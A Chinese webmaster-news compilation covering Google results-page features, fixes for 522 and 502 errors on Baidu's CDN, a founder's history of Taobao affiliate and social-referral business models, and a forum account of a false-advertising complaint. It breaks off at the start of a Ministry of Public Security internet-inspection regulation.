付费搜索结果出现在自然搜索结果之前,有时也会出现在自然搜索结果之后。两种类型的结果实际上是无法区分的,唯一的真正区别是付费广告被标记为下方这样(带有Ad/广告字样) 付费广告亿每次点击付费(PPC)为基础,这就是说广告客户对关键词的出价,并未每次点击支付搜索费用。尽管搜索引擎还会考虑广告和点击率等相关因素,但通常出价最高的客户将会获得最高排名。 2、自动搜索结果 随机搜索结果是搜索引擎中索引的页面,由于通常有成千上万个匹配结果,因此搜索引擎使用数百个排名因素对其进行排序。最终会导致相关性和高质量的页面通常最终出现在SERP的第一页。 关于搜索引擎的排名因素,这里我们来列举一部分。 例如,搜索引擎通常显示标题、URL和描述性代码段。 你可以通过设置页面的标题标签、URL和描述标签来告诉搜索引擎在SERP中显示什么。但是,搜索引擎几乎总是在SERP中显示硬编码的标题标签,但它通常选择摘录描述标签以外的内容。 对于具有结构化数据的页面,搜索引擎有时也会在常规自动搜索结果旁边显示丰富的摘要。 如果要显示在自然搜索结果中,则需要重点关注为用户查询创建最佳和最相关的结果。同时还需要确保搜索引擎可以为你的网页编制索引,并且针对搜索进行优化。 3、SERP功能 SERP功能是非传统的搜索结果,比如可以从谷歌的知识图谱(Knowledge Graph)中直接获得。 尽管SERP功能的目的有时是直接为搜索引擎创造收入,但大多数时候还是为用户搜索提供有效的信息,同时不需要进行额外的页面点击。 SERP功能对SEO有着重大影响,最近的统计表现,超过50%的搜索没有点击 (50.33%的搜索形成实际点击量) 备注:谷歌并不是总在结果中显示SERP功能,在过去的几年中,随着谷歌建立自己的知识图谱(Knowledge Graph),该功能开始更加频繁的出现,并且对搜索意图的智能理解得到了提高。同时以SERP功能为特色也可以增加网站建设者的访问次数。 SERP有哪些功能? 以谷歌为例,在结果中显示了数十种常见的SERP功能,并且一直在不断测试和调整新功能。下面我们来介绍一些最常见的类型,通过这些数据的展示,希望可以帮助你的网站提升更多流量。 1、精选片段 精选的片段显示了排名最高的网页之一的内容短片,通常显示在SERP的顶部,有时候其他结果也会显示在它们上方。 常见的摘要格式包括: 段落 清单 表格 并非所有精选短片都是以文本形式展示,有时候会显示视频内容 你的网页可以出现在精选片段中吗? 答案是:可以!大多数情况下,谷歌会从前5名结果之一中摘录片段。如果你已经在查询中排在前5名,并且谷歌显示了精选的代码段,则可能有必要对页面进行优化以尝试出现在【精选片段】中。 2、知识卡(Knowledge card) 知识卡显示在SERP的顶部,可为查询提供简短的正确答案,一般有多种格式。 知识卡的数据主要有以下三种:谷歌的知识图谱、数据合作伙伴以及其他受到高度信任的数据源,例如维基百科和官方政府机构。 你的网页可以出现在知识卡中吗? 不太可能!由于数据是专门从谷歌认为的受信任第三方来源提取的,因此对于大多数网站来说,不可能在知识卡中显示。 3、知识面板(Knowledge Panel) 知识面板提供有关查询主题的信息,通常出现在移动设备上SERP的顶部附近,或者网页端的右侧。像知识卡一样,知识面板中的大多数数据都来自知识图谱,以及维基百科之类的可靠数据源。但是,谷歌有时还会链接到社交账号和合作伙伴。 你的网页可以出现在“知识面板”中吗? 可以!谷歌在“知识图谱”中显示品牌的知识面板,这些通常包括直接链接到该品牌公司的网站和社交账号中。 你的公司图标也可以出现在竞争对手的“知识面板”中,若有用户点击了你的图标,将对公司进行搜索,借此来展示你的公司信息,起到推广的作用。 4、图片包(Image Pack) 图片包会显示一些缩略图,单机它们即可将用户带到谷歌图片,通常也会显示在SERP的顶部,同样也会显示在页面的下方。 你的页面可以显示在图片包中吗? 有可能。你的网页上的图片可以显示在此处,但该链接始终会将搜索用户带到谷歌图片,而不是你的网站。如果他们点击进入图片,会看到一些指向图片来源的链接,这里可以将用户导向你的页面。 5、热门话题(Top stories) 热门话题轮播会显示最近发表的文章、博客和视频。每一个搜索结果都会显示缩略图、标题、发布者名称和时间戳,通常显示在SERP的顶部附近。 你的网页可以出现在“热门话题”轮播中吗? 可以。不过根据研究显示,在PC端上搜索结果99.31%来自谷歌新闻索引的网站,并且这里大多数的排名都是短暂的,因为SERP功能的目的是为了显示新结果,而不是长期存在。 6、人们常问的问题(People Also Ask (PAA)) “人们常问的问题”会显示搜索着提供的相关问题,并且从网页中提取相关答案,该网页的显示方式与精选片段相似。每当你点击显示答案时,会加载出更多相关问题。 你的网页可以出现在“人们常问的问题”中? 可以。像精选片段一样,这一功能的答案也是来自第三方,只要能够回答这些问题中一个或者多个的内容,均有机会被展示。但通常在这里不太可能引导更多的流量。 7、购物结果(Shopping results) 购物结果展示了付费广告客户的相关产品,每个结果都包含产品名称、价格和零售商信息,以及会展示一些特定的评论和优惠。 你的网页可以在“购物结果”中显示吗? 是,但需要花钱。 8、网站链接(Sitelinks) 附加链接是指在排名网站上添加指向其他网站链接,或导向网站内部其他页面,它们比SERP功能对常规自然搜索结果有更强的作用。 添加链接的好处: 1、人们可以更快地找到要搜索的内容 2、人们更有可能在SERP中点击你的网站 你可以出现在附加链接中吗? 是。你的谷歌附加链接通常会显示品牌查询,因此用户在搜索你的网站时很可能已经看到附加链接。 对于非品牌查询,至少目前来看,若页面受欢迎并且具有指向用户感兴趣的其他相关内容的内部链接时,有可能获得附加链接。 9、影片(Videos) 视频影片结果是通过视频缩略图方式来展示,只有带有嵌入视频的页面才有资格展示,并且谷歌通常还会在SERP中显示上传提起、视频时长以及上传者的名称。这些视频大多数来自YouTube,但偶尔也有其他的视频网站。 你可以出现在“视频结果”中吗? 可以。如果是在YouTube上传的视频,谷歌会直接适配并且显示缩略图。如果是其他网站,则需要满足VideoObject才能使用该功能。 以上就是“9步骤”帮助你了解谷歌搜索引擎上SERP排名,希望可以帮助各位在谷歌上获取更好的网页排名。 注:本文编译自ahrefs,原文标题What are SERPs? Search Engine Results Pages Explained #### 全面解决使用百度云加速网站出现522、502情况 要说使用百度云加速客户反馈最常见的问题是什么,无疑是响应522、502的情况。这个时候很多客户会以为是百度云加速问题,其实主机吧接触到反馈的客户中几乎100%都是客户原因,也都在主机吧的售后下解决了问题。今天主机吧来教大家如何解决522、502的情况。 522:意味着云加速CDN节点请求源站服务器发生了超时。 502是网关或者代理工作的服务器尝试执行请求时,从上游服务器接收到无效的响应。 一、服务器防火墙拦截 这个是最常见的问题,很多客户其实不知道自己服务器装的防火墙是会拦截CDN的IP的,百度云加速IP节点要大量抓取网站内容,而且进入服务器的频率也高,很容易导致防火墙拦截,自然就会出现522,我们只需要把百度云加速的IP段加入白名单即可,如果你不知道服务器防火墙如何添加白名单,那么您可以把防火墙关了,用了百度云加速后,一般不需要防火墙。 二、服务器连接不稳定 百度云加速的国内节点单节点都是50G的,宽带非常高,所以一般只要正常的服务器是不会出现连接超时的,比如服务器内存、CPU、宽带这三个配置其中有一个出现满负荷了都是影响节点连接,所以选择好的服务器很重要,我们不一定要BGP多线什么的,但是配置一定要尽量高,线路单线就可以,以主机吧的个人经验CDN最好是用电信联通这些单线机房的,宽带要足够高,10MB以上,加速效果明显还很稳定。 三、服务器是海外的 虽然百度云加速是支持海外服务器的,但是国内节点访问国外服务器我们还是要考虑到地理位置因素,国内宽带访问国外网站速度并不快,而且时常出现访问不上的情况,所以这也会导致经常出现522的原因,如果必须放国外的服务器的尽量选择电信联通直联的,对国内线路优化过的机房,比如阿里云的香港服务器就做得不错。 四、网站被攻击 网站CC攻击导致CPU、内存、宽带满负荷会出现源站访问慢、访问不了的情况,如果确认是被CC攻击的,请进入云加速安全功能-ADS,开启CC防护-强力防护模式。这样就可以解决CC攻击导致服务器满状态问题。 五、程序问题 很多客户的程序运行效率并不高,甚至有时会卡死,主机吧就见过一个客户网站用的是NET编程的,总是卡死应程序池,导致访问不上,这也会出现522的情况,选择好的程序对站长很重要!   好了,以上就是使用云加速常见522、502的几个原因,如果以上问题都没有,那不防联系官方企业QQ咨询下吧。自己检测是不是节点问题其实很简单,只要自己ping下自己的域名看看节点是否有丢包的情况就可以了,你还可以查询同IP节点下的网站访问是否有异常。 #### 全面解析淘宝客赚钱的往事 一、淘宝客的第一个黄金年代 淘宝客最初的推广是频道集合页,就是把一些开通了淘宝客推广佣金的商品根据类目做成一些频道页,然后媒体可以拿这个频道页的专属推广链接挂到自己的网站上,媒体的用户看到相应的产品点到淘宝这边来进行购买,购买完成后媒体方可以获得这个商品的推广佣金收益,从而进行变现。 在2010年的时候,阿里妈妈做了更深层的一些API开放,所有的有佣金商品都可以通过API去获取,还能返回跟这个订单相关的各种数据参数,由于这样一些接口的开放带来了淘宝客推广的第一次大爆发。因为在此之前只能是有流量的大媒体挂淘宝客的推广频道可以获得收入。而开放了这个API接口,各种各样的小媒体或者创业团队都可以围绕这些底层支持做各种各样的导购玩法了。 我也是在2011年看到这样的一个大机会,才毅然决然从返利网离职出来创业,做了一个淘宝返利的网站,只用了15万元的亏损,就把公司做到年营收超过3000万,今天来看那是第一个淘宝客赚钱的黄金年代。 接下来我们就一起回顾下那些黄金年代(2010-2015年)都有那些主流的淘宝客模式。 第一种就是给用户提供购物返利的淘宝客模式,比如返利网、易购、米折、返还网、淘粉吧、返利邦等,因为用户每一次通过我们这些网站去淘宝购买,我们都可以获取一笔收入,那么我们再把这个收入中的绝大部分返给用户,让用户享受到了购物返现金的优惠,从而吸引用户长期通过返利网站去淘宝购物的习惯,从而获得长久的粘性留存。 而我们返利网站也可以从中获取一部分佣金收益,比如一个商品有10元的佣金,我们把其中的8元用来作为返利返给用户,我们自己留下剩余的2元作为利润。这是一个三方共赢的事情,淘宝卖家获得了商品的推广销售、用户变现获得了优惠、返利平台获得了用户和利润。这个在今天来看大家估计都能理解,但是在2010-2013年期间大量的人不明白返利网站把钱都返给用户了,你们返利平台怎么赢利呢,哈哈,我记得那时候经常接到很多朋友带着这样的疑问来咨询我。 第二种就是给用户提供内容导购的淘宝客模式,比如美丽说、蘑菇街就是典型的内容导购模式,他们专注于服饰搭配领域的淘宝导购,把淘宝里面一些看起来非常漂亮的穿着和搭配图片抓取过来,采用信息流阅览的方式给用户提供浏览服务,大家把这种网站理解为讲时尚穿着搭配的电子杂志就可以了。 这种模式对于年轻女性来说吸引力巨大,因为如果你自己去逛淘宝,真的很累,找到你满意的商品需要花费大量的时间,而你上蘑菇街、美丽说这些网站,他们都给你找好了,你可以更高效的浏览和购买,所以当年这两家也是如日中天。 其实我个人在2007年的时候也做过类似项目,但是我没有想到采用这样的解决方案,因为最早我还在淘宝兼职开店,2005开了一个运动鞋店,2006年开一个女装店,很多女孩子来买衣服经常问我怎么搭配,其实我一个大老爷们哪里懂搭配啊,我当时就把这些问题复制给我的供应商,供应商回答什么我在复制过来回答给用户,当时我的2个店做的都是空手套白狼的生意,也就是今天大家知道的一件代发模式。 慢慢的我也发现了这竟然是一个需求,所以在2007年我也做了一个女性购物资讯的网站,把门户网站搭配频道的咨询内容搬过来,然后在每一个内容旁边配上差不多的衣服产品。一边做导购,一边做交易,当时我们只有2个人,还没什么钱,一共投入2万块钱不到,用脚想想也是失败,所以半年多的时间我们就做不下去给关了。 没想到在关掉之前我们这个项目当年获得了上海互联网大会的“最佳草根之星奖”,哈哈哈。当时我们第一创业很傻逼,也没想想为什么不采用蘑菇街这种高效的解决方案呢,今天来看也许那时候时机还不成熟,首先那时候没有淘宝客这种可以变现的通路,其次那时候的淘宝商品图片都还没进入到正规化的模特拍摄,真人都没出境,就是一件衣服挂在那里拍摄,不具有观赏导购感。可能更重要的是我们的认知问题,那时候就是一个单纯的小年轻,才21岁啥都不懂。好吧,这里就是一段我个人的穿插,下面我们继续接着讲。 第三种就是给用户提供特卖导购的淘宝客模式,比如折800、卷皮、楚楚街等就是这种模式,而卷皮也是国内风靡一时的九块九包邮的创始者,他们最早叫“九块邮”,刚开始的模式就是把淘宝里面所有的9.9包邮的商品精选出来,给用户提供导购,节省用户在淘宝浏览找9.9包邮商品的时间。从这个基础的功能需求起步,然后逐步分为9.9、19.9、29.9等不同的包邮类目,整个商品内容采用小编精选+招商BD的方式获取,这种模式当年也是如日中天那,获得了各大资本的青睐,VC们很看好从导购未来转型自营的机会,这几家也都达到了独角兽级别的估值。 我们接下来在讲讲第一个黄金年代的没落是如何产生的: 首先返利模式是从淘宝2013年开始不断的调整返利政策开始的,因为返利类型的网站交易规模在淘宝的占比越来越大,带给淘宝的新用户逐步在减少,认为我们这些返利网站不断的在吸引淘宝的老用户,所以他们逐步的调整政策。 第一步就是限制我们一直告诉用户的复制淘宝商品的网址来搜索返利的功能; 第二步就是让我们把返现金改为返支付宝集分宝; 第三步就是不允许我们这里出现搜索结果页,也就是你无法告知用户这个商品能有多少返利,只能跳转到爱淘宝去购买,买完确认收货以后才知道返利多少钱,用户体验将至冰点。 那些年真的是每年出一招,招招毙命啊,虽然我们也在极力的克服这些问题,以保证用户返利体验的不受影响,但是淘宝每年这么一调整对我们来说就是下降50%的业绩。当然我们也能理解淘宝的一些做法,好在他们还没有完全“赶尽杀绝”留给了我们一些继续发展的空间,这就是阿里的仁义之处,他们不支持,但是不会一刀切,给你足够的时间去调整和转型,所以在此期间很多朋友们都转型了,米折转型做了贝贝、返还网转型做了美柚。 其次我们在讲讲蘑菇街、美丽说为何从淘宝客导购开始一步步转型的,应该是在2013年中旬开始,淘宝愈发察觉到这两家占据到淘宝外部流量来源的比例越来越高,一开始淘宝是想收购蘑菇街,但是给予的收购条款可能太过于苛刻,所以之后这笔交易就未能达成。那么后来就发生了一些不愉快的事情,比如停止淘宝登录使用、限制链接继续往淘宝跳转等措施,彻底逼迫蘑菇街和美丽说寻求自营转型的道路。 很多人可能会有疑问,为什么这两家网站为淘宝提供的是优质内容导购,反而会被淘宝限制呢?说到这里就不得不说淘宝的流量安全策略,马云说过淘宝的流量来源应该是草原,而不是森林,这样淘宝自身才绝对安全,草原就意味着无数的毛细血管渠道在给淘宝输送源源不断的流量,但是每一家的流量来源出问题对淘宝来说都不会造成任何影响,而流量森林就是一颗颗大树在给淘宝输送流量,这样如果某一些树出现问题,淘宝的流量就不够安全,所以草原才是淘宝需要的流量来源模式,这也就是淘宝为什么会暂停和蘑菇街、美丽说合作的底层原因。 如果不限制这些导购网站会越做越大,未来某一天如果不给淘宝导流转型自营了,对淘宝来说不就是养了一个潜在竞争对手吗。作为一个和淘宝合作多年的老淘客来说,我也能完全理解淘宝的一些策略,屁股决定脑袋,如果是我在淘宝的相关位置上,我也会这样来决策,没有谁对谁错,都是为了各自公司的利益。 最后我们继续讲一下折800、卷皮、9.9包邮等网站的衰退原因, 一方面是来自淘宝的限制,一方面也是来自于拼多多的崛起,同样也是2013年10月份开始淘宝逐步限制此类网站的流量权重,来自折800和卷皮以及其他一些9.9包邮的流量都不计入淘宝卖家的销售权重。 熟悉淘宝规则的人都知道,淘宝卖家在站外亏本低价获取流量到淘内成交,最主要的有以下几个目的: 1、通过这些站外流量把他们在淘宝内的店铺和商品信用度、销量、评价做起来,然后有了这些基础的销量支撑就可以在淘宝的主搜中获得一些关键字的搜索排名,从而获得淘宝站内免费流量; 2、有了这些成交作为基础铺垫,然后去购买淘宝站内的直通车等淘宝广告,用户进店后可以提高购买转化率,一看销售了几万件,好评那么多,那肯定这个款很受欢迎啊,哈哈; 3、还有一些原因是通过这些基础销售支持后去报名淘宝的站内活动,包括聚划算、天天特卖等,从而获得更大的销售量; 所以当来自某一个渠道的购买成交一旦在淘内没有了销售权重,这些卖家在外部亏本促销,从而实现淘宝站内流量的免费获取就无法成立,这是最底层的一个逻辑。 当这些问题出现以后,折800、卷皮们也开始了转型自营招商的道路,但是以前做成交容易是因为整体嫁接在淘宝这个生态之上,一旦转型自营以后那就是另外一个天地。当然另一方面拼多多借助微信流量和拼团强势崛起,主打下沉市场的平价购物,对于卷皮和折800的转型来说也是一座无法跨越的大山。 淘客的第一个黄金年代基本到2015年底算是差不多结束了,我至今仍然怀念那个百花齐放、百家争鸣的时代,这里面的大量企业创始人我们都是认识多年的朋友,所以在这里我也祝福老友们在新的时代里继续大放光彩,因为你们在我心中都是最牛逼的。 二、淘宝客的第二个黄金年代 淘宝客的第二个黄金年代是2015年-2017年,第二阶段爆发的最大推动力我个人观察下来应该是淘宝单品隐藏优惠券的发明,最早淘宝也在学习各大B2C电商发布一些店铺通用券,这种券其实推起来还是比较困难的,难点主要在于以下2点: 1、店铺优惠券是一种针对整个淘宝店铺或部分类目的满减优惠券,说白了就是那种满200-50,满100-20的店铺通用券,对于卖家来说店内各种商品的毛利润都不一样,设置这种通用券很可能导致部分商品会亏损;另外如果单品客单价比较低,这种通用券很可能用不上,就算用上了减去的金额也是非常小,比如100-5这种就没什么吸引力; 2、对于淘宝客推广者而言,这种店铺券很难去推,用户对某个店铺的满减券没什么概念,不清楚这个券能购买什么商品,且使用门槛高,减去的额度又比较低; 所以基于以上原因,店铺券的推广一直不温不火,甚至还不如单品高返利这种模式吸引人。 转折点就在于后来淘宝发明了单品优惠券,就是卖家可以针对店铺的商品单独设置一定金额的立减优惠券,还可以针对不同渠道对不同商品设置优惠券。说白了这个优惠券的链接只会给某个渠道的用户看到,普通用户去淘宝购物的时候是看不到这个单品优惠券的,这就是后面大家都认为的“隐藏优惠券”。这种券其实并不是隐藏,只是给到了一些特定渠道,在零售中我们也叫这种营销策略为价格歧视。 有了单品优惠券这个吸引点以后,最早的一波推广者采用的是QQ群和微信群来推广,打的噱头就是阿里亲友福利,我记得很多人都说这是淘宝内部员工的福利群,领券购买某些爆款产品可以减去很大的金额,比如100-50,50-20这种,真的对普通用户的吸引力很大,用户体验过这种立减优惠券以后就立马能够感知到这个好处,所以他们对群的这种粘性就形成了。单品高额优惠券的底层逻辑就是卖家把优惠券额度提高,但是把以前的那种推广高佣金降低下来,其实成本的支出都是差不多的,但是这样一转换对用户来说吸引力就巨大了,对淘客来说虽然佣金变低了,但是转化成交更容易。 其次给用户的是一种即时立减,不像我们以前做返利,还需要先付款100元,等确认收货后再给你返10元,这种有一定的延后性,一般延后时间为7-15天,且给新用户建立信任的周期较长,而立减单品券可以秒级给用户建立信任关系。 所以很多人在2015-2017年之间会看到大量的人在做QQ群、微信群淘宝客,并在这里面赚到了大钱,这个早期发展用户特别容易,基本只要靠红包裂变就能快速搞一个几百人的微信群出来,然后借助群控工具和发单机器人来管理和维护,单群的产出,一天可以有50-100元的利润,那么如果你手上有1000个群,你一天就是5-10万的佣金收益。 这期间诞生了大量的群控工具和发单软件,帮助这些淘客们来解放双手,用系统化的解决方案来帮助大家提效。这些服务商也是借助这波淘客的崛起赚到了大量的现金,比如我们熟悉的实惠猪、互力、懒懒淘客助手等都是这一波诞生的。 这一次除了群控和发单工具爆发了以外,同时还诞生了一些新型的淘客服务商,他们分别是采集群、采集站和招商淘客。采集群诞生的原因是因为大家手上都有了N多的群,每天发什么样的商品和优惠券给用户是个问题,大量的人都是没有选品能力的,这时候就诞生了天峻精品联盟、若梦精品联盟等,他们通过自己的小编去全网寻找对接到热门爆款和性价比高的商品发到自己的群里。接着那些不会选品,但是有自己群的淘客们加入,用机器人同步转播到自己的群里去,这样采集群就等于占据到了头部的分发地位,通过他们出来的一个单品,很快可以在全网的淘客群内出现,从而瞬间出现到数以百万的购物用户面前,这种分发能力一旦建立,商家都会慕名而来,盈利变现能力就非常强。 采集站的建立也是这种逻辑,为广大不会选品的淘客提供选品服务,采集站的商品来源其实最早也是来自于各个采集群,只不过他们除了服务普通的选品小白用户以外,更多的是为各种导购APP和H5导购站提供商品的API接口输出,通过API接口可以很容易的批量获取到最新的热卖商品和实时排行,这样做导购APP和H5导购站的公司就可以很快的把自己的淘宝导购商品库建立起来,对于采集站来说最主要的也是建立起自己的分发能力,有了分发能力就很容易盈利,这个我一会统一的讲一下采集群和采集站他们到底怎么盈利,这种采集站的主要代表有大淘客、好单库等。 另外这里面还有最牛逼的一个角色一定不能遗漏,那就是招商淘客,不论是采集群还是采集站,他们其实对接的淘宝商家也是有限的,那么这里面就需要另外一种角色,就是有商家资源的招商淘客,这些招商淘客们一边手上握有淘宝商家资源,另外一边又对接了各种分发渠道,所以他们就在这中间充当了桥梁的角色,通过帮助商家打造热卖爆款,拿到了商家为其设置的独家优惠券和佣金,然后招商淘客把这些准爆款商品推荐到各个分发渠道,最终根据独家优惠券的使用数量进行招商服务费的结算。 我记得刚开始最猛的时候一单有2元的服务费,然后这些服务费招商淘客和分发渠道进行分成。很多热门爆款一天轻轻松松就有几万单或十几万单,所以过去这么几年做招商淘客的这波兄弟们都大赚特赚呀,不战是做招商淘客最早参与者和推动者,为招商淘客的崛起做了很大的贡献,当然他也在这个机会中赚到了不少钱,哈哈。这波机会我又完美错过,以前一心想做大平台,看不上这个玩意,泪奔~ 另外还有一大部分的推动者就是从返利网出来的老同事们,因为在返利网工作的时候他们就负责超级返商品的招商,随着全网淘客生态协作的完善,出来单干赚钱那是水到渠成的事情。只是到今天并不是那么容易做了,招商的服务费也下降了非常多,现在已经属于一个固定存量市场,利润在逐渐变薄。 所以在第二个黄金阶段大家都可以看到,针对用户导购的淘宝客、采集群采集站、和招商淘客形成了新时代的淘客导购生态,这里面有人做商品招商负责供应链端,有人负责做渠道分发、有人负责最终的用户拓展和导购成交、还有人提供工具服务,参与其中的人在这几年都赚到了大钱呀,这个数字到底是多少我也不知道,就算知道了我也不能说,哈哈,但是我知道他们的车越换越高级,迈巴赫、宾利都快是大牛们的标配了。也是在这个阶段淘客的从业人数开始了逐步的大爆发,因为只要会使用工具软件,会做微信群、QQ群裂变拉人就能做淘客赚钱,把这个从业门槛大大降低了。 三、淘宝客的第三个黄金年代 淘宝客的第三个黄金年代主要是因为在2017年7月微信开始大封号开始,至今仍然还是处于第三次机会的黄金时期。在此之前做微信群、QQ群淘客是主流模式,但是微信开始打击群控机器人以后,这些手里的几百个、几千个群的淘客们一夜回到解放前。这时候大家思考最多的是,还是要把用户放在APP里,原有的那波微信群淘客需要新的用户沉淀阵地,所以这个时候主打共享淘客APP的模式开始诞生了。 共享淘客APP其实很容易理解,就是平台方开发一款导购APP,共享给所有的淘客们(推广者)来使用,采用平台方统一的品牌。淘客们注册成为一个平台的合作者,然后把自己的社群用户导入APP,用户后续的购买都是通过共享APP来完成,还可以把APP里的商品分享到微信群和朋友圈,好友购买后就能赚取佣金收益。这类APP有个共同的特点就是需要有邀请码才能注册成功,通过邀请码绑定所有人的邀请关系,这个邀请关系也是未来的利益分配关系。 本质上这类共享APP和上面讲的返利类导购APP没有任何区别,我们以前的做法是做一个返利导购APP,平台方自己包揽了产品技术、运营、客服和市场推广等,几乎所有的工作都需要平台方自己来弄。这里面成本最高的就是市场投放,现在移动互利网红利消失殆尽,一个APP的获客成本奇高无比,如果在算上后续的转化率、留存复购这些,几乎想赚钱是很难的。 但是共享APP做了一个流量创新,平台方负责开发好APP和负责内容运营,流量获取部分交给外部的合作伙伴,利益也分配给外部的合作伙伴,所有的用户既是消费者,也是创业者,自用省钱、分享赚钱。说白了平台方把以前应该支付给各大媒体的投放费用,现在改为了分配给所有的平台推广用户。 所有的用户都是平台的兼职工作人员,通过利益机制的设定,让他们自主的去全网为平台拉人,比平台工作人员还要努力的去做用户的社群维系、管理和培训。在这个模式下,曾经有从业过微商、直销的一些用户成长起来很快,短时间内就可以把自己的团队做到几万、几十万甚至上百万级别,他们的月收入也是能够达到几万、几十万、甚至是百万级。而这些社交导购平台也能够在短时间内快速的增长到数以百万级的日活,目前市场上我们看到的花生日记、蜜源、粉象生活、好省、美逛等,包括我创业做的兔子优选(现与好省合并)都是这样的社交导购平台。 我是在2017年底启动兔子优选这个项目,最初通过在朋友圈引入30个宝妈教他们做淘客赚钱,开了2场线上培训会,2个月他们给我带来几千人的种子用户,月度佣金收益轻松破了20万。后续也是依靠这些人继续裂变推广,最终获得了近50万的代理推广用户,年佣金收益超过5000万,给淘宝带去的交易额超8亿,这是我们以前做投放购买用户想都不敢想的事情。 总的来看社交淘客在以下几个机制上做了重大创新: 1、打破以往平台方和用户关系之间的扁平化运营,采用了分层分级运营。 所有的用户加入之后,各个平台都会给用户设定一个成长体系,一般都是有初级、中级、高级这些用户等级,每一个等级的用户都对应不同的分佣比例、层级抽佣奖励关系等,让用户有一种打怪升级的感觉,且所有的管理都是自上而下的社群管理为主,平台方链接运营头部团队长,然后头部们在去链接运营自己的核心团队长,再由这些核心团队长去链接自己的核心用户,层层递进运营。 2、利用损失厌恶心理设计用户分佣激励 普通用户邀请到一个好友来使用,如果你的成长速度,也就是你等级低于好友成长,那么相关的奖励你就会享受不到或者享受到很少,所以你必须要和自己的下级好友在同一等级或者更高层级才可以得到更多的激励,而要升级就必须多邀请好友,多培训他们,让他们快速把团队发展起来,把推广收益做起来。这种奖励机制的设计牛逼之处在于所有人都有危机感,都必须想办法升到最高级才有安全感,所以在用户体系层面这个飞轮的设计也很关键。设计的好,整个雪球的滚动越来越大,在这块的设计上还真是很有讲究的,如果某一块没设计好,整个飞轮就无法转动(具体的不方便透露太多,想了解的可以私下交流)。 3、通过会员费或者大礼包的设计,引入微商直销群体加入 这些社交淘客APP最初的设计出发点其实主要用来给淘客们当工具用,平台方主要是靠卖软件使用费赚钱。后面有些平台发展的越来越创新,把会员费和礼包模式设计进来,比如你拉一个代理来使用这个工具分享赚钱,他必须缴纳299或者399的会员费用,这个费用可以分给上游的邀请者,让大家可以享受到这种快速赚会员费分成的刺激。 因为微商直销那波人都是赚快钱赚习惯了,让他们来靠佣金赚慢钱其实刺激是不到位的,但是把会员费结合进来那就牛逼了,微商们很喜欢。用户出钱购买了会员,可以拿到更高的分佣比例和用户等级,这是实实在在的诱惑。另外花钱买了会员他也总想要尽快赚回来,这时候他就会继续邀请人来购买会员,同时淘宝购物又是整个国民的基础刚需,这种模式满足了微商既能短期赚快钱的想法,又能享受长期赚佣金通道收益的利润,所以在这种模式的刺激下他们一旦决定加入整个团队就会迎来爆发式增长。当然现在绝大部分APP都进行了合规改进,很少再有那种会员费的模式,但是野蛮生长初期,这种会员费模式对于微商直销团队的引入和平台用户的增长还是起到了很关键的作用。 可能还会有人问做这种社交淘客和直接做阿里妈妈淘客有什么区别?最大的区别是你做阿里妈妈淘客,阿里那边不支持多级分销和抽成体系,必须要你自己每天使劲的推广才可以有收益。而社交淘客个最大的功能他为所有的推广者提供了一个团队管理和分账体系,可以绑定多级利益奖励关系,当你的团队成员足够多了以后,你自己不去分享商品,每天依靠团队的自购和分享给你带来的奖励就可以轻松日入上千、上万,这才是最大的诱惑,也就是所有平台都在宣传的躺赚逻辑。 4、把淘客推广从业门槛直接降低到0 第一个黄金年代做淘客创业其实是精英人群才能干的事情,因为你需要组建团队,融资,同时还需要懂产品、懂技术、懂管理、懂运营还需要懂规模化低成本的获取流量。 第二个黄金年底相对于第一个来说确实已经很大程度上降低了从业门槛,但是淘客从业还需要懂一些群控工具的使用和规模流量获取,对于普通人来说还是有一定的门槛。 但是到了第三个黄金年底只要你会发朋友圈、会邀请人、会社群运营都可以参与到这种社会化的淘客大分销中来,参与全民创业。所以过去一年我们看到淘客的从业人数从以前的100万,增长到400万,再到最新的数据1000万(2019年双十一启动会上,来自淘宝联盟的官方数据),大量的家庭主妇和全职宝妈通过社交淘客找到了自己的归属,让她们可以兼顾家庭和赚钱两不误,这一点也是我认为社交淘客大爆发的一个重要原因。 最后可能很多人就会有疑问,社交淘客的终极目的是什么?为什么淘宝以前不支持返利模式,现在却支持社交淘客的返利模式?理由很简单,以前淘宝一家独大,现在淘宝面临的威胁也很大,一方面需要迎战拼多多拓展下沉市场,另外一方面还需要去微信里获取流量,所以基于社交代理淘客的模式对淘宝来说,等于养了几千万的人肉链接器,源源不断的从微信里给淘宝带来所需要的草原流量。我们都知道阿里和腾讯是2个大的数字经济体,阿里需要流量,腾讯拥有流量,那么这里面的人肉连接器的价值就是非常巨大的,学过梁宁产品思维三十讲的朋友们应该都知道点、线、面、体的原理,面在打架的时候我们做里面的点就有红利。 来源:老胡地盘 #### 公司官网被专业打假的举报投诉虚假宣传面临处罚 各位做公司网站的站长同学注意啦,千万别在官网上虚假宣传,现在有一群专门这种打假投诉的,专门盯这块的。 论坛上一位站长就中招了: 事情是这样的,前几个月做了一个公司官网。关于我们页面介绍那里有几条信息有一点浮夸,昨天早上市场监督管理局打电话说被人举报了,让去市场监督管理局过去处理一下。到地后执法人员也说了对方就是专门这种打假投诉的,他们也不太想管。但是对方投诉了又要给个反馈。(对方举报实名的,还留了信息,想的是联系他们交钱,他们撤销投诉)最后他们说现在有两种办法。一是交罚款,可以说网站是外包给别人做的,交合同费用的3-5倍就行了(估计在3000-5000)。如果说网站自己做的就麻烦了,20万罚款起步二是直接不去处理,他们把我公司拉入黑名单说是联系不到公司管理人。不过我把公司的注册地址更换到其他辖区后面再申请就可以移除黑明单了。第二种方式是要找个其他辖区的挂靠地址,费用的话我也不知道需要多少钱。想在论坛里面问下,这两种方式那个好一些,还有就是第二种方式迁移地址需要多少费用(地址:上海)。在此提醒下坛友们检查下自己的网站,不要被那些不要脸的企业给举报了。来自:https://www.4414.cn/thread-79185-1-1.html 根据《中华人民共和国广告法》第九条第一款第(三)项(即“广告不得有下列情形:(三)使用“国家级”、“最高级”、“最佳”等用语”)的规定。单这条国内就很多公司中招了。 对此一位站长反馈他们家公司也遇到这个情况,也是网站上有极限字被职业举报人举报,本来是联系举报人协商的,举报人要的太多,最后是用的第二种方法直接办公地址迁移,不过费用还是很高的,远比第一种费用高,并且用了几个月时间才处理好,麻烦的很。 所以各位站长在做网站的时候用词要小心啦,以免中招,造成不必要的损失。 #### 公安部:公安机关互联网安全监督检查规定(具体细则) 中华人民共和国公安部令 第151号 《公安机关互联网安全监督检查规定》已经2018年9月5日公安部部长办公会议通过,现予发布,自2018年11月1日起施行。   部长  赵克志 2018年9月15日 公安机关互联网安全监督检查规定 第一章 总则 第一条 